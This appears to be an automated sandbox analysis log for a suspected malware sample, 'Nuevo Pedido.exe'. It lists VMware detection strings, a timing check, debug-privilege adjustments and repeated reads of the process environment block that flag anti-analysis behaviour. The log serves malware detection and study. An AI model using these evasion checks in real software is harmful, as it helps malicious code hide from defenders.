            Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
            Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A369A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A441E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A72073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A85BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A44257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A68DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A3A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A714FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DF716 mov eax, dword ptr fs:[00000030h]
